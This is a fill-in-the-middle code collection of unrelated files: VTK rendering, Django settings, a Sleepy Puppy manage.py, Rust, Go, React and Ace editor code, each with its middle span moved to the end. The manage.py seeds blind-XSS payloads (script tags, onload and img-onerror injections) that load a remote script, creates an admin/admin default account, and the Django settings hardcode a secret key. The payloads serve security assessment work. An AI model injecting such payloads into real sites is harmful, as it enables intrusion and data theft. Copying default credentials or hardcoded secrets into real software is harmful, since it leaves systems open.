aTriangleStrip.GetPointIds().SetId(1,1) aTriangleStrip.GetPointIds().SetId(2,2) aTriangleStrip.GetPointIds().SetId(3,3) aTriangleStrip.GetPointIds().SetId(4,4) aTriangleStripGrid = vtk.vtkUnstructuredGrid() aTriangleStripGrid.Allocate(1,1) aTriangleStripGrid.InsertNextCell(aTriangleStrip.GetCellType(),aTriangleStrip.GetPointIds()) aTriangleStripGrid.SetPoints(triangleStripPoints) aTriangleStripMapper = vtk.vtkDataSetMapper() aTriangleStripMapper.SetInputData(aTriangleStripGrid) aTriangleStripActor = vtk.vtkActor() aTriangleStripActor.SetMapper(aTriangleStripMapper) aTriangleStripActor.AddPosition(8,0,2) aTriangleStripActor.GetProperty().BackfaceCullingOn() # Line linePoints = vtk.vtkPoints() linePoints.SetNumberOfPoints(2) linePoints.InsertPoint(0,0,0,0) linePoints.InsertPoint(1,1,1,0) aLine = vtk.vtkLine() aLine.GetPointIds().SetId(0,0) aLine.GetPointIds().SetId(1,1) aLineGrid = vtk.vtkUnstructuredGrid() aLineGrid.Allocate(1,1) aLineGrid.InsertNextCell(aLine.GetCellType(),aLine.GetPointIds()) aLineGrid.SetPoints(linePoints) aLineMapper = vtk.vtkDataSetMapper() aLineMapper.SetInputData(aLineGrid) aLineActor = vtk.vtkActor() aLineActor.SetMapper(aLineMapper) aLineActor.AddPosition(0,0,4) aLineActor.GetProperty().BackfaceCullingOn() # Poly line polyLinePoints = vtk.vtkPoints() polyLinePoints.SetNumberOfPoints(3) polyLinePoints.InsertPoint(0,0,0,0) polyLinePoints.InsertPoint(1,1,1,0) polyLinePoints.InsertPoint(2,1,0,0) aPolyLine = vtk.vtkPolyLine() aPolyLine.GetPointIds().SetNumberOfIds(3) aPolyLine.GetPointIds().SetId(0,0) aPolyLine.GetPointIds().SetId(1,1) aPolyLine.GetPointIds().SetId(2,2) aPolyLineGrid = vtk.vtkUnstructuredGrid() aPolyLineGrid.Allocate(1,1) aPolyLineGrid.InsertNextCell(aPolyLine.GetCellType(),aPolyLine.GetPointIds()) aPolyLineGrid.SetPoints(polyLinePoints) aPolyLineMapper = vtk.vtkDataSetMapper() aPolyLineMapper.SetInputData(aPolyLineGrid) aPolyLineActor = vtk.vtkActor() aPolyLineActor.SetMapper(aPolyLineMapper) aPolyLineActor.AddPosition(2,0,4) aPolyLineActor.GetProperty().BackfaceCullingOn() # Vertex vertexPoints = vtk.vtkPoints() vertexPoints.SetNumberOfPoints(1) vertexPoints.InsertPoint(0,0,0,0) aVertex = 
vtk.vtkVertex() aVertex.GetPointIds().SetId(0,0) aVertexGrid = vtk.vtkUnstructuredGrid() aVertexGrid.Allocate(1,1) aVertexGrid.InsertNextCell(aVertex.GetCellType(),aVertex.GetPointIds()) aVertexGrid.SetPoints(vertexPoints) aVertexMapper = vtk.vtkDataSetMapper() aVertexMapper.SetInputData(aVertexGrid) aVertexActor = vtk.vtkActor() aVertexActor.SetMapper(aVertexMapper) aVertexActor.AddPosition(0,0,6) aVertexActor.GetProperty().BackfaceCullingOn() # Poly Vertex polyVertexPoints = vtk.vtkPoints() polyVertexPoints.SetNumberOfPoints(3) polyVertexPoints.InsertPoint(0,0,0,0) polyVertexPoints.InsertPoint(1,1,0,0) polyVertexPoints.InsertPoint(2,1,1,0) aPolyVertex = vtk.vtkPolyVertex() aPolyVertex.GetPointIds().SetNumberOfIds(3) aPolyVertex.GetPointIds().SetId(0,0) aPolyVertex.GetPointIds().SetId(1,1) aPolyVertex.GetPointIds().SetId(2,2) aPolyVertexGrid = vtk.vtkUnstructuredGrid() aPolyVertexGrid.Allocate(1,1) aPolyVertexGrid.InsertNextCell(aPolyVertex.GetCellType(),aPolyVertex.GetPointIds()) aPolyVertexGrid.SetPoints(polyVertexPoints) aPolyVertexMapper = vtk.vtkDataSetMapper() aPolyVertexMapper.SetInputData(aPolyVertexGrid) aPolyVertexActor = vtk.vtkActor() aPolyVertexActor.SetMapper(aPolyVertexMapper) aPolyVertexActor.AddPosition(2,0,6) aPolyVertexActor.GetProperty().BackfaceCullingOn() # Pentagonal prism pentaPoints = vtk.vtkPoints() pentaPoints.SetNumberOfPoints(10) pentaPoints.InsertPoint(0,0.25,0.0,0.0) pentaPoints.InsertPoint(1,0.75,0.0,0.0) pentaPoints.InsertPoint(2,1.0,0.5,0.0) pentaPoints.InsertPoint(3,0.5,1.0,0.0) pentaPoints.InsertPoint(4,0.0,0.5,0.0) pentaPoints.InsertPoint(5,0.25,0.0,1.0) pentaPoints.InsertPoint(6,0.75,0.0,1.0) pentaPoints.InsertPoint(7,1.0,0.5,1.0) pentaPoints.InsertPoint(8,0.5,1.0,1.0) pentaPoints.InsertPoint(9,0.0,0.5,1.0) aPenta = vtk.vtkPentagonalPrism() aPenta.GetPointIds().SetId(0,0) aPenta.GetPointIds().SetId(1,1) aPenta.GetPointIds().SetId(2,2) aPenta.GetPointIds().SetId(3,3) aPenta.GetPointIds().SetId(4,4) aPenta.GetPointIds().SetId(5,5) aPenta.GetPointIds().SetId(6,6) aPenta.GetPointIds().SetId(7,7) aPenta.GetPointIds().SetId(8,8) aPenta.GetPointIds().SetId(9,9) aPentaGrid = vtk.vtkUnstructuredGrid() aPentaGrid.Allocate(1,1) aPentaGrid.InsertNextCell(aPenta.GetCellType(),aPenta.GetPointIds()) aPentaGrid.SetPoints(pentaPoints) aPentaMapper = vtk.vtkDataSetMapper() aPentaMapper.SetInputData(aPentaGrid) aPentaActor = vtk.vtkActor() aPentaActor.SetMapper(aPentaMapper) aPentaActor.AddPosition(10,0,0) aPentaActor.GetProperty().BackfaceCullingOn() # Hexagonal prism hexaPoints = vtk.vtkPoints() hexaPoints.SetNumberOfPoints(12) hexaPoints.InsertPoint(0,0.0,0.0,0.0) hexaPoints.InsertPoint(1,0.5,0.0,0.0) hexaPoints.InsertPoint(2,1.0,0.5,0.0) hexaPoints.InsertPoint(3,1.0,1.0,0.0) hexaPoints.InsertPoint(4,0.5,1.0,0.0) hexaPoints.InsertPoint(5,0.0,0.5,0.0) hexaPoints.InsertPoint(6,0.0,0.0,1.0) hexaPoints.InsertPoint(7,0.5,0.0,1.0) hexaPoints.InsertPoint(8,1.0,0.5,1.0) hexaPoints.InsertPoint(9,1.0,1.0,1.0) hexaPoints.InsertPoint(10,0.5,1.0,1.0) hexaPoints.InsertPoint(11,0.0,0.5,1.0) aHexa = vtk.vtkHexagonalPrism() aHexa.GetPointIds().SetId(0,0) aHexa.GetPointIds().SetId(1,1) aHexa.GetPointIds().SetId(2,2) aHexa.GetPointIds().SetId(3,3) aHexa.GetPointIds().SetId(4,4) aHexa.GetPointIds().SetId(5,5) aHexa.GetPointIds().SetId(6,6) aHexa.GetPointIds().SetId(7,7) aHexa.GetPointIds().SetId(8,8) aHexa.GetPointIds().SetId(9,9) aHexa.GetPointIds().SetId(10,10) aHexa.GetPointIds().SetId(11,11) aHexaGrid = vtk.vtkUnstructuredGrid() aHexaGrid.Allocate(1,1) 
aHexaGrid.InsertNextCell(aHexa.GetCellType(),aHexa.GetPointIds()) aHexaGrid.SetPoints(hexaPoints) aHexaMapper = vtk.vtkDataSetMapper() aHexaMapper.SetInputData(aHexaGrid) aHexaActor = vtk.vtkActor() aHexaActor.SetMapper(aHexaMapper) aHexaActor.AddPosition(12,0,0) aHexaActor.GetProperty().BackfaceCullingOn() ren1.SetBackground(.1,.2,.4) ren1.AddActor(aVoxelActor) aVoxelActor.GetProperty().SetDiffuseColor(1,0,0) ren1.AddActor(aHexahedronActor) aHexahedronActor.GetProperty().SetDiffuseColor(1,1,0) ren1.AddActor(aTetraActor)<|fim▁hole|>ren1.AddActor(aWedgeActor) aWedgeActor.GetProperty().SetDiffuseColor(0,1,1) ren1.AddActor(aPyramidActor) aPyramidActor.GetProperty().SetDiffuseColor(1,0,1) ren1.AddActor(aPixelActor) aPixelActor.GetProperty().SetDiffuseColor(0,1,1) ren1.AddActor(aQuadActor) aQuadActor.GetProperty().SetDiffuseColor(1,0,1) ren1.AddActor(aTriangleActor) aTriangleActor.GetProperty().SetDiffuseColor(.3,1,.5) ren1.AddActor(aPolygonActor) aPolygonActor.GetProperty().SetDiffuseColor(1,.4,.5) ren1.AddActor(aTriangleStripActor) aTriangleStripActor.GetProperty().SetDiffuseColor(.3,.7,1) ren1.AddActor(aLineActor) aLineActor.GetProperty().SetDiffuseColor(.2,1,1) ren1.AddActor(aPolyLineActor) aPolyLineActor.GetProperty().SetDiffuseColor(1,1,1) ren1.AddActor(aVertexActor) aVertexActor.GetProperty().SetDiffuseColor(1,1,1) ren1.AddActor(aPolyVertexActor) aPolyVertexActor.GetProperty().SetDiffuseColor(1,1,1) ren1.AddActor(aPentaActor) aPentaActor.GetProperty().SetDiffuseColor(.2,.4,.7) ren1.AddActor(aHexaActor) aHexaActor.GetProperty().SetDiffuseColor(.7,.5,1) ren1.ResetCamera() ren1.GetActiveCamera().Azimuth(30) ren1.GetActiveCamera().Elevation(20) ren1.GetActiveCamera().Dolly(1.25) ren1.ResetCameraClippingRange() renWin.Render() cellPicker = vtk.vtkCellPicker() pointPicker = vtk.vtkPointPicker() worldPicker = vtk.vtkWorldPointPicker() cellCount = 0 pointCount = 0 ren1.IsInViewport(0,0) x = 0 while x <= 265: y = 100 while y <= 200: cellPicker.Pick(x,y,0,ren1) pointPicker.Pick(x,y,0,ren1) worldPicker.Pick(x,y,0,ren1) if (cellPicker.GetCellId() != "-1"): cellCount = cellCount + 1 pass if (pointPicker.GetPointId() != "-1"): pointCount = pointCount + 1 pass y = y + 6 x = x + 6 # render the image # iren.Initialize() # --- end of script --<|fim▁end|>
aTetraActor.GetProperty().SetDiffuseColor(0,1,0)
<|file_name|>settings.py<|end_file_name|><|fim▁begin|>""" Django settings for djangoApp project. Generated by 'django-admin startproject' using Django 1.10.5. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'r&j)3lay4i$rm44n%h)bsv_q(9ysqhl@7@aibjm2b=1)0fag9n' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'djangoApp.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'djangoApp.wsgi.application' # Database # https://docs.djangoproject.com/en/1.10/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True <|fim▁hole|># https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/'<|fim▁end|>
USE_TZ = True # Static files (CSS, JavaScript, Images)
<|file_name|>manage.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # Copyright 2015 Netflix, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import os from flask_script.commands import ShowUrls, Clean from flask.ext.script import Manager from flask.ext.migrate import Migrate, MigrateCommand from sleepypuppy.admin.admin.models import Administrator from sleepypuppy import app, db from js_strings import default_script, alert_box, console_log, default_without_screenshot, generic_collector manager = Manager(app) migrate = Migrate(app, db) manager.add_command('db', MigrateCommand) @manager.shell def make_shell_context(): """ Creates a python REPL with several default imports in the context of the app """ return dict(app=app) @manager.command def create_db(): """ Creates a database with all of the tables defined in your Alchemy models """ db.create_all() @manager.command def drop_db(): """ Drops a database with all of the tables defined in your Alchemy models """ db.drop_all() @manager.command def create_login(login): """ Seed the database with an admin user. """ print 'creating admin user' if Administrator.query.filter_by(login=login).count(): print 'user already exists!' return # Check env for credentials (used by docker) docker_admin_pass = os.getenv('DOCKER_ADMIN_PASS', None) if docker_admin_pass: admin_user = Administrator(login=login, password=docker_admin_pass) else: # else, ask on stdin: while True: print "{}, enter your password!\n ".format(login) pw1 = getpass.getpass() pw2 = getpass.getpass(prompt="Confirm: ") if pw1 == pw2: admin_user = Administrator(login=login, password=pw1) break else: print 'passwords do not match!' db.session.add(admin_user) db.session.commit() print 'user: ' + login + ' created!' @manager.command def default_login():<|fim▁hole|> existing_admin = Administrator.query.filter( Administrator.login == 'admin').first() if existing_admin: print "Admin account (admin) already exists, skipping." else: admin_user = Administrator(login='admin', password='admin') print 'user: ' + 'admin' + ' created!' 
db.session.add(admin_user) db.session.commit() return from collections import namedtuple DefaultPayload = namedtuple( 'DefaultPayload', ['payload', 'notes', 'snooze', 'run_once']) DEFAULT_PAYLOADS = [ DefaultPayload('<script src=$1></script>', None, False, False), DefaultPayload('</script><script src=$1>', None, False, False), DefaultPayload( '&lt;script src=$1&gt;&lt;/script&gt;', None, False, False), DefaultPayload('&lt;/script&gt;&lt;script src=$1&gt;', None, False, False), DefaultPayload('''" onload="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);" garbage="''', None, False, False), # noqa DefaultPayload("""'"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False), # noqa DefaultPayload("""Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 '"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False) # noqa ] DefaultPuppyscript = namedtuple('DefaultPuppyscript', ['name', 'code', 'notes']) DEFAULT_JAVASCRIPTS = [ DefaultPuppyscript('Default', default_script, 'Default collects metadata for capture table including a screenshot'), DefaultPuppyscript('Default Without Screenshot', default_without_screenshot, 'Generating a screenshot can be CPU intensive and even in some cases cause browser instability, so for some assessments this may be a better option. '), DefaultPuppyscript( 'Alert Box', alert_box, 'Generates an alert box for notification purposes'), DefaultPuppyscript( 'Console Log', console_log, 'Log a message in the browser\'s console'), DefaultPuppyscript('Generic Collector: IP Address', generic_collector, 'Example showing how you can create generic JavaScripts for collecting any text data you choose. In this example we use ajax to determine IP address and record the value. ') ] @manager.command def create_bootstrap_assessment(name="General", add_default_payloads=True): """ Creates an assessment and attaches a few default payloads. 
""" from sleepypuppy.admin.assessment.models import Assessment from sleepypuppy.admin.payload.models import Payload from sleepypuppy.admin.puppyscript.models import Puppyscript assessment = Assessment.query.filter(Assessment.name == name).first() if assessment: print("Assessment with name", name, "already exists, exiting.") return else: assessment = Assessment( name=name, access_log_enabled=False, snooze=False, run_once=False) # add assessment db.session.add(assessment) db.session.commit() existing_payload = Payload.query.filter(Payload.id == 1).first() if existing_payload: print("Payloads already exists, exiting.") else: if add_default_payloads: for payload in DEFAULT_PAYLOADS: payload = Payload( payload=payload.payload, notes=payload.notes, ordering=u'1' ) db.session.add(payload) db.session.commit() existing_puppyscript = Puppyscript.query.filter(Puppyscript.id == 1).first() if existing_puppyscript: print("Puppyscripts already exists, exiting.") else: for puppyscript in DEFAULT_JAVASCRIPTS: puppyscript = Puppyscript( name=puppyscript.name, code=puppyscript.code, notes=puppyscript.notes ) db.session.add(puppyscript) db.session.commit() @manager.command def setup_sleepy_puppy(): create_db() create_bootstrap_assessment() create_login('admin') @manager.command def list_routes(): func_list = {} for rule in app.url_map.iter_rules(): if rule.endpoint != 'static': func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__ from pprint import pprint pprint(func_list) if __name__ == "__main__": manager.add_command("clean", Clean()) manager.add_command("show_urls", ShowUrls()) manager.run()<|fim▁end|>
""" Seed the database with some inital values """
<|file_name|>fileops.rs<|end_file_name|><|fim▁begin|>//! Contains operations related to the /dev/ipath character files.<|fim▁hole|>use std::ffi::CString; use libc::c_int; use std::os::unix::io::{RawFd, AsRawFd}; use std::ops::Drop; use std::io::Error; pub struct Fd(RawFd); impl Fd { pub fn open<T: Into<String>>(path: T, mode: c_int) -> Result<Fd, Error> { let fd = unsafe { libc::open(CString::new(path.into()) .unwrap_or(CString::new("").unwrap()).as_ptr(), mode) }; match fd { -1 => Err(Error::last_os_error()), _ => Ok(Fd(fd)) } } fn close(&self) -> c_int { unsafe { libc::close(self.0) } } // With F_SETFD we only care if fcntl failed pub fn try_set_flag(&self, flag: c_int ) -> Result<c_int, Error> { match unsafe { libc::fcntl(self.0, libc::F_SETFD, flag) } { -1 => Err(Error::last_os_error()), ret @ _ => Ok(ret) } } } impl AsRawFd for Fd { fn as_raw_fd(&self) -> RawFd { self.0 } } impl Drop for Fd { // XXX: Do we need to check result of close? fn drop(&mut self) { if self.0 != -1 { self.close(); } } } #[test] // Check open/close on a file that should exist in most linux based OS. fn open_close_devnull() { use std::error::Error as std_error; match Fd::open("/dev/null", libc::O_RDONLY) { Err(e) => panic!(e.description().to_owned()), _ => () } }<|fim▁end|>
extern crate libc;
<|file_name|>test.go<|end_file_name|><|fim▁begin|>package main import ( "log" "time" "dwmb/comm" "dwmb/display" "dwmb/request" "dwmb/rfid" "dwmb/sound" ) func quickMessage(messages chan<- *comm.DisplayMessage, text string) { messages <- &comm.DisplayMessage{Message: text} } func processResponse(messages chan<- *comm.DisplayMessage, messageTimer *time.Timer, resp *request.Response) { log.Printf("got response: %v\n", resp) message := &comm.DisplayMessage{} if resp.Message != "" && resp.Message != "ok" { text, timeout := display.MakeMessage(resp) messageTimer.Reset(timeout * time.Second) message.Message = text } for i, slot := range resp.Slots { switch slot { case request.Free: message.Lights[i] = comm.Green case request.Occupied: message.Lights[i] = comm.Yellow case request.Alarm: message.Lights[i] = comm.Red default: message.Lights[i] = comm.Off } } messages <- message return } func main() { states, messages, err := comm.Init("/dev/ttyAMA0", 115200) if err != nil { log.Fatal(err) } tags, err := rfid.Init("/tmp/poop") if err != nil { log.Fatal(err) } server := request.NewServer("http://do:1234", "6x9=42") state := &comm.State{Message: ""} tag := &rfid.Tag{}<|fim▁hole|> messages <- &comm.DisplayMessage{Message: "hi!"} messageTimer := time.NewTimer(3 * time.Second) go func() { for { <-messageTimer.C messages <- &comm.DisplayMessage{Message: "\a"} } }() for { select { case state = <-states: state.Snapshot = "/tmp/cam1/lastsnap.jpg" resp, err := server.SendState(state) if err != nil { log.Print(err) } else { if resp.Message == "theft" { sound.Play("alarm", true) } else { sound.Stop() } processResponse(messages, messageTimer, resp) } case tag = <-tags: resp, err := server.SendTag(tag) if err != nil { quickMessage(messages, "error :(") log.Print(err) } else { sound.Play("poop", false) processResponse(messages, messageTimer, resp) } } } }<|fim▁end|>
sound := sound.NewSound("./sounds")
<|file_name|>ClientListComponent.js<|end_file_name|><|fim▁begin|>import React from 'react'; import _ from 'lodash'; import moment from 'moment'; import ClientListFilterComponent from './ClientListFilterComponent'; import ClientListItemComponent from './ClientListItemComponent'; <|fim▁hole|>class ClientListComponent extends React.Component { constructor() { super(); this.state = { orderByDate: true, gridView: false } } setGridView(boolean) { this.setState({ gridView: boolean }) } setSortedByDateState(boolean) { this.setState({ orderByDate: boolean }) } chooseOrderByType() { return this.state.orderByDate ? this.orderByDate() : this.orderByAlphabet(); } orderByAlphabet() { return _.orderBy(this.props.clientlist, 'clientName', 'asc'); } orderByDate() { return _.orderBy(this.props.clientlist, 'submitDate', 'desc'); } render() { return ( <div> <ClientListFilterComponent gridView={this.state.gridView} changeToGridView={boolean => this.setGridView(boolean)} orderByDate={this.state.orderByDate} handleClick={boolean => this.setSortedByDateState(boolean)} /> <ul className={this.state.gridView ? "clientlist__list grid" : "clientlist__list"}> { this.chooseOrderByType().map(client => ( <ClientListItemComponent gridView={this.state.gridView} key={client.token} getRequest={client => this.props.getRequest(client)} client={client}/> ))} </ul> </div> ) } }; export default ClientListComponent;<|fim▁end|>
<|file_name|>singlebyte.rs<|end_file_name|><|fim▁begin|>// This is a part of rust-encoding. // Copyright (c) 2013-2015, Kang Seonghoon. // See README.md and LICENSE.txt for details. //! Common codec implementation for single-byte encodings. use libtww::std::convert::Into; use util::{as_char, StrCharIndex}; use types::*; /// A common framework for single-byte encodings based on ASCII. #[derive(Copy, Clone)] pub struct SingleByteEncoding { pub name: &'static str, pub whatwg_name: Option<&'static str>, pub index_forward: fn(u8) -> u16, pub index_backward: fn(u32) -> u8, } impl Encoding for SingleByteEncoding { fn name(&self) -> &'static str { self.name } fn whatwg_name(&self) -> Option<&'static str> { self.whatwg_name } fn raw_encoder(&self) -> Box<RawEncoder> { SingleByteEncoder::new(self.index_backward) } fn raw_decoder(&self) -> Box<RawDecoder> { SingleByteDecoder::new(self.index_forward) } } /// An encoder for single-byte encodings based on ASCII. #[derive(Clone, Copy)] pub struct SingleByteEncoder { index_backward: fn(u32) -> u8, } impl SingleByteEncoder { pub fn new(index_backward: fn(u32) -> u8) -> Box<RawEncoder> { Box::new(SingleByteEncoder { index_backward: index_backward }) } } impl RawEncoder for SingleByteEncoder { fn from_self(&self) -> Box<RawEncoder> { SingleByteEncoder::new(self.index_backward) } fn is_ascii_compatible(&self) -> bool { true } fn raw_feed(&mut self, input: &str, output: &mut ByteWriter) -> (usize, Option<CodecError>) { output.writer_hint(input.len()); for ((i, j), ch) in input.index_iter() { if ch <= '\u{7f}' { output.write_byte(ch as u8); continue; } else { let index = (self.index_backward)(ch as u32); if index != 0 { output.write_byte(index); } else { return (i, Some(CodecError { upto: j as isize, cause: "unrepresentable character".into(), })); } } } (input.len(), None) } fn raw_finish(&mut self, _output: &mut ByteWriter) -> Option<CodecError> { None } } /// A decoder for single-byte encodings based on ASCII. #[derive(Clone, Copy)] pub struct SingleByteDecoder { index_forward: fn(u8) -> u16, } impl SingleByteDecoder {<|fim▁hole|> pub fn new(index_forward: fn(u8) -> u16) -> Box<RawDecoder> { Box::new(SingleByteDecoder { index_forward: index_forward }) } } impl RawDecoder for SingleByteDecoder { fn from_self(&self) -> Box<RawDecoder> { SingleByteDecoder::new(self.index_forward) } fn is_ascii_compatible(&self) -> bool { true } fn raw_feed(&mut self, input: &[u8], output: &mut StringWriter) -> (usize, Option<CodecError>) { output.writer_hint(input.len()); let mut i = 0; let len = input.len(); while i < len { if input[i] <= 0x7f { output.write_char(input[i] as char); } else { let ch = (self.index_forward)(input[i]); if ch != 0xffff { output.write_char(as_char(ch as u32)); } else { return (i, Some(CodecError { upto: i as isize + 1, cause: "invalid sequence".into(), })); } } i += 1; } (i, None) } fn raw_finish(&mut self, _output: &mut StringWriter) -> Option<CodecError> { None } } /// Algorithmic mapping for ISO 8859-1. pub mod iso_8859_1 { #[inline] pub fn forward(code: u8) -> u16 { code as u16 } #[inline] pub fn backward(code: u32) -> u8 { if (code & !0x7f) == 0x80 { code as u8 } else { 0 } } } #[cfg(test)] mod tests { use all::ISO_8859_2; use types::*; #[test] fn test_encoder_non_bmp() { let mut e = ISO_8859_2.raw_encoder(); assert_feed_err!(e, "A", "\u{FFFF}", "B", [0x41]); assert_feed_err!(e, "A", "\u{10000}", "B", [0x41]); } }<|fim▁end|>
<|file_name|>main.js<|end_file_name|><|fim▁begin|>import qambi, { getMIDIInputs } from 'qambi' document.addEventListener('DOMContentLoaded', function(){ console.time('loading and parsing assets took') qambi.init({ song: { type: 'Song', url: '../data/minute_waltz.mid' }, piano: { type: 'Instrument', url: '../../instruments/heartbeat/city-piano-light-concat.json' } }) .then(main) }) function main(data){ console.timeEnd('loading and parsing assets took') let {song, piano} = data song.getTracks().forEach(track => { track.setInstrument(piano)<|fim▁hole|> track.connectMIDIInputs(...getMIDIInputs()) }) let btnPlay = document.getElementById('play') let btnPause = document.getElementById('pause') let btnStop = document.getElementById('stop') let divLoading = document.getElementById('loading') divLoading.innerHTML = '' btnPlay.disabled = false btnPause.disabled = false btnStop.disabled = false btnPlay.addEventListener('click', function(){ song.play() }) btnPause.addEventListener('click', function(){ song.pause() }) btnStop.addEventListener('click', function(){ song.stop() }) }<|fim▁end|>
track.monitor = true
<|file_name|>keybinding-vscode.js<|end_file_name|><|fim▁begin|>ace.define("ace/keyboard/vscode",[], function(require, exports, module) { "use strict"; var HashHandler = require("../keyboard/hash_handler").HashHandler; var config = require("../config"); exports.handler = new HashHandler(); exports.handler.$id = "ace/keyboard/vscode"; exports.handler.addCommands([{ name: "toggleWordWrap", exec: function(editor) { var wrapUsed = editor.session.getUseWrapMode(); editor.session.setUseWrapMode(!wrapUsed); }, readOnly: true }, { name: "navigateToLastEditLocation", exec: function(editor) { var lastDelta = editor.session.getUndoManager().$lastDelta; var range = (lastDelta.action == "remove")? lastDelta.start: lastDelta.end; editor.moveCursorTo(range.row, range.column); editor.clearSelection(); } }, { name: "replaceAll", exec: function (editor) { if (!editor.searchBox) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, true); }); } else { if (editor.searchBox.active === true && editor.searchBox.replaceOption.checked === true) { editor.searchBox.replaceAll(); } } } }, { name: "replaceOne", exec: function (editor) { if (!editor.searchBox) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, true); }); } else { if (editor.searchBox.active === true && editor.searchBox.replaceOption.checked === true) { editor.searchBox.replace(); } } } }, { name: "selectAllMatches", exec: function (editor) { if (!editor.searchBox) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); }); } else { if (editor.searchBox.active === true) { editor.searchBox.findAll(); } } } }, { name: "toggleFindCaseSensitive", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.caseSensitiveOption.checked = !sb.caseSensitiveOption.checked; sb.$syncOptions(); }); } }, { name: "toggleFindInSelection", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.searchOption.checked = !sb.searchRange; sb.setSearchRange(sb.searchOption.checked && sb.editor.getSelectionRange()); sb.$syncOptions(); }); } }, { name: "toggleFindRegex", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.regExpOption.checked = !sb.regExpOption.checked; sb.$syncOptions(); }); } }, { name: "toggleFindWholeWord", exec: function (editor) { config.loadModule("ace/ext/searchbox", function(e) { e.Search(editor, false); var sb = editor.searchBox; sb.wholeWordOption.checked = !sb.wholeWordOption.checked; sb.$syncOptions(); }); } }, { name: "removeSecondaryCursors", exec: function (editor) { var ranges = editor.selection.ranges; if (ranges && ranges.length > 1) editor.selection.toSingleRange(ranges[ranges.length - 1]); else editor.selection.clearSelection(); } }]); [{ bindKey: {mac: "Ctrl-G", win: "Ctrl-G"}, name: "gotoline" }, { bindKey: {mac: "Command-Shift-L|Command-F2", win: "Ctrl-Shift-L|Ctrl-F2"}, name: "findAll"<|fim▁hole|> name: "goToPreviousError" }, { bindKey: {mac: "F8|Option-F8", win: "F8|Alt-F8"}, name: "goToNextError" }, { bindKey: {mac: "Command-Shift-P|F1", win: "Ctrl-Shift-P|F1"}, name: "openCommandPallete" }, { bindKey: {mac: "Command-K|Command-S", win: "Ctrl-K|Ctrl-S"}, name: "showKeyboardShortcuts" }, { bindKey: {mac: "Shift-Option-Up", win: "Alt-Shift-Up"}, name: "copylinesup" }, { bindKey: {mac: "Shift-Option-Down", win: "Alt-Shift-Down"}, name: 
